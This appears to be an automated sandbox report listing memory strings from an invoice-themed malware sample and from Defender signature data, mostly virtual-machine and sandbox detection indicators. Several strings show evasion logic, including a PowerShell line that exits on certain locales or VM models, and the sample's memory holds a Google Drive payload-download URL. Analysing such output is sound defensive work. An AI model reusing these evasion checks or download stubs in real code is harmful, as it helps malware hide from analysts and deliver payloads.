calldynmem_checks_if_debugged_docdynmem_checks_if_debugged_undocdynmem_checks_ntglobalflagdynmem_checks_processheapdynmem_detects_virtualpcdynmem_detects_vmdynmem_detects_vmwaredynmem_kernel_scandynmem_reads_vdll_codedynmem_self_modifying_codedynmem_uses_access_violationdynmem_uses_bound_exceptionsdynmem_uses_breakpointsdynmem_uses_div_by_zerodynmem_uses_int_overflowdynmem_uses_invalid_opcodesdynmem_uses_privinstrdynmem_uses_single_steppingdynmem_uses_udbgrddynmem_uses_udbgwrdynmem_uses_unusual_breakpointenable_binlibenable_lshashenable_vmm_growentrybyte55entrybyte60entrybyte90entrypoint_in_headerentrypoint_in_import_tableepatscnstartepatstartentrysectepatstartlastsectepcallnextepinfirstsectepiniatepoutofimageepscn_eqsizesepscn_falignepscn_islastepscn_valignepscn_vfalignepscn_writableepsec_not_executableexecutable_imageexecutble_imageexecutes_from_dynamic_memoryexecutes_from_last_sectionexecutes_from_resourcesextended_pestaticfirstsectwritableforce_dtforce_expensive_processingforce_unpackinggenpackedhandle_large_vahas_checksumhas_delay_load_importshas_many_resourceshas_msilresourceshasappendeddatahasboundimportshasexportshasstandardentryheaderchecksum0hstr_exhaustiveia64_imageimport_via_tlsinv_argumentsinv_datainv_decompress_errorinv_dos_signatureinv_e_lfanewinv_exportsinv_fileinv_filealignmentinv_filesizeinv_imagebaseinv_nomemoryinv_notimplementedinv_nt_signatureinv_optional_magicinv_overlappinginv_rawoffsetinv_rawsizeinv_readinv_rvainv_sectionalignmentinv_sizeofheadersinv_sizeofimageinv_sizeofoptionalheaderinv_unsupported_mac
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	Binary or memory string: 4ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	Binary or memory string: "/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: VMware_Virtual
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	Binary or memory string: Z"/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: %ProgramData%\Microsoft\Windows\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: z"vmware"$bisvm=trueelseif$smodel="virtualbox"
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: VBoxTrayToolWndClass
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	Binary or memory string: MachineInfo isVirtualMachine
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: % *.bin.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	Binary or memory string: =mQ:#LowFiDetectsVmWare
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: \\.\VBoxGuest\\.\VMDRVSYSTEM\CurrentControlSet
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: vboxhook.dll
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	Binary or memory string: vmware-tray.exe
Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: MpSigStub.exe, 00000023.00000003.6309167109.0000028BD7FFE000.00000004.00000001.sdmp	Binary or memory string: lbum.exeticket.zipuspsdhlspchPo.php?www=/release/setup.zipexe/release/install./release/new/setup.rar/index.php?c=RaE.scr.pdf..php?receipt_print=.php?receipt=/facebook//info.php?info=/info.php?label=/main.php?label=/main.php?info=/info.php?id=/flash/?/?d=/d/install.exe/index.php?key=.php?id=aJT.php?htm/setup.RPF:FakePAVURLinstall.SIGATTR:LoadsObscureDllRPF:LowFiObscureDllReadRPF:LowFiObfuscatorVM!Themida!CodeVirtualizer!Armadillo!Armadillo_4!Armadillo_5xRPF:DetectsVmWareRPF:DetectsVPCRPF:DetectsVMHSTR:VirTool:Win32/Obfuscator.YVSIGATTR:VirTool:Win32/Obfuscator.YV.2HSTR:Rogue:Win32/FakePAV_lowfiPEBMPAT:Trojan:Win32/Tibs_lowfiHSTR:Rogue:Win32/FakePAV_2_lowfiHSTR:Rogue:Win32/FakePAV_3_lowfianajbio.exesyuy2.exe~!#RPF:KaraganyFilename.BRPF:KaraganyFilename.A\AppData\Roaming\\Application Data\tfn.tmp.exeRPF:SkuffbotFilename.Asvchosts.exeRPF:SkuffbotFilename.BRPF:SkuffbotFilename.C.ps1.vbscod.gpj.gnp.txt.ftr.tpp.piz.rar.slx.fdp.RPF:RLOUnknownExtensionFilenameRPF:RLOFilenameRPF:RLOUnknownExtensionFilenameType1client.dllClient.dllclient_p.dllclient32_p.dllclient64_p.dlld64_p.dllmain_dll.dllinst_dll.dllVncDLL.dllRPF:CarberpVncDLLRPF:VawtrakDLLRPF:UrsnifDLLRPF:SampleCollectRPF:ObfuscatorWU.pif.scrIMG_FacebookRPF:PEWithImageFilename.Askype-imgprofile-imgprofile-facebookimg-facebookImages-Facebookimage-facebookDCIM-IMGSkype.ImageImage.Skypeskype_profilefileqemurecodispljrcgdwgpixbmpRPF:PEWithImageFilename.Bjpgimgapi_irispngr.out.png.exer.in.png.exe.pdfPrologue.Web.PDF.exeRPF:PEWithDocFilename.A.doc.xls.ppt.htmjpegdocxxlsxpptx.html.JPG.zip\RPF:PEWithImageFilename.C%s%s%sRPF:Napolar_Section_NameRPF:SirefefInstallationPathEPaEPbEPd.virus@h
Source: MpSigStub.exe, 00000023.00000003.6286232837.0000028BD6261000.00000004.00000001.sdmp	Binary or memory string: ,system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	Binary or memory string: vmusrvc
Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp	Binary or memory string: IsVmWare
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	Binary or memory string: VMWARETRAY.EXE
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: azurevirtualmachinename
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .RCT.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp	Binary or memory string: dynmem_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .AVHD.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.6271144612.0000028BD765F000.00000004.00000001.sdmp	Binary or memory string: \vmnet.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: =8*\|%systemroot%\System32\Vmcompute.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6309167109.0000028BD7FFE000.00000004.00000001.sdmp	Binary or memory string: RPF:DetectsVmWare
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	Binary or memory string: VmWarePlayer
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vboxservice.exe")thenexit
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2627838947.0000000000643000.00000004.00000020.sdmp	Binary or memory string: erogram Files\Qemu-ga\qemu-ga.exellP*b
Source: MpSigStub.exe, 00000023.00000003.6285070883.0000028BD693A000.00000004.00000001.sdmp	Binary or memory string: RDC:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	Binary or memory string: %qemu
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .HRL.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	Binary or memory string: .VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: ,Administrator,Guest,vmware
Source: MpSigStub.exe, 00000023.00000003.6285070883.0000028BD693A000.00000004.00000001.sdmp	Binary or memory string: !#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: vmtools.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .VMCX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	Binary or memory string: virtual hd]
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: &!*.txt.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: vboxservice
Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp	Binary or memory string: PSF1.00123456789ABCDEF0123456789abcdefpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_disable_apicall_limitpea_kernel_scanpea_uses_single_steppingpea_uses_breakpointspea_uses_privinstrpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_access_violationpea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_vsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_genpackedpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_access_violationpea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesiz
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: % *.xml.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	Binary or memory string: f)a.VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000023.00000003.6271144612.0000028BD765F000.00000004.00000001.sdmp	Binary or memory string: unsubscribe vmnet notification
Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	Binary or memory string: \\.\VBoxMiniRdrDN
Source: RegAsm.exe, 0000000A.00000002.7230551454.0000000001592000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: Anti Sandboxie/VMware
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2628814510.0000000002AE0000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7226801339.0000000001370000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmms.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	Binary or memory string: myapp.exeqemu
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: AntiVmWare
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: "IsInVMware":
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2627838947.0000000000643000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	Binary or memory string: FA*.\|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: % *.img.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: sandboxvmware]
Source: RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .ISO.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	Binary or memory string: *.\|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: RegAsm.exe, 0000000A.00000002.7226801339.0000000001370000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	Binary or memory string: Global\VBoxService.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: ZU%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000023.00000003.6269231712.0000028BC3EF4000.00000004.00000001.sdmp	Binary or memory string: VMwareVMware
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: vboxmrxnp.dll
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .VSV.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmms.exe\|Microsoft-Hyper-V
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	Binary or memory string: Running on VMWare
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	Binary or memory string: %vmware
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: 3.%ProgramFiles%\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: if(((get-uiculture).name-match"ru\|ua\|by\|cn")-or((get-wmiobject-classwin32_computersystem-propertymodel).model-match"virtualbox\|vmware\|kvm")){exit;}
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: &!*.xml.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: vmGuestLib.dll
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	Binary or memory string: !#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	Binary or memory string: Virtual HD
Source: MpSigStub.exe, 00000023.00000003.6326659590.0000028BD6468000.00000004.00000001.sdmp	Binary or memory string: 8mus=mud_muramuyamuebmufbmuhbmu_emuiemuqemuimmujnmuhomubrmufrmu]tmuevmucwmucymu
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	Binary or memory string: vmware-authd.exe
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	Binary or memory string: *.log.\|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-aarch64.exe
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: *.BIN.\|%SYSTEMPROCESS%\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: VMWare
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	Binary or memory string: qemuvirtualvmware\\.\PhysicalDrive0
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: vmwareservice.exe
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: >Host: virtualmachine-update.com
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .vhds.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: &!*.rom.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp	Binary or memory string: detects_vmware
Source: MpSigStub.exe, 00000023.00000003.6285070883.0000028BD693A000.00000004.00000001.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: *.BIN.\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: Systeminfo \| findstr /i modelExecToStackVirtualBoxVirtual MachineVMware
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	Binary or memory string: vmsrvc
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .)*.BIN.\|%SYSTEMPROCESS%\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp	Binary or memory string: pea_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp	Binary or memory string: aplicativos.netlhe.com/vmnetdhcp/
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: % *.rom.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: % *.toc.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .vhdpmem.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: idKasperkyVPCVMWareSandboxieHiJackThisgetDevicesRC4
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	Binary or memory string: \\vmware-host:Y
Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp	Binary or memory string: Vmware
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: azurevirtualmachinename_scrubbed
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	Binary or memory string: vmtools
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	Binary or memory string: $ARRAY = [ "vmtoolsd.exe" , "vbox.exe" ]
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	Binary or memory string: vmtoolsx7
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .VHD.\|\|Microsoft-Hyper-V
Source: RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: &!*.bin.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: &!*.img.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp	Binary or memory string: QEMU
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: VBoxTray
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .VHDX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd.exe
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	Binary or memory string: "Microsoft Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: HARDWARE\ACPI\RSDT\VBOX__
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-i386.exe
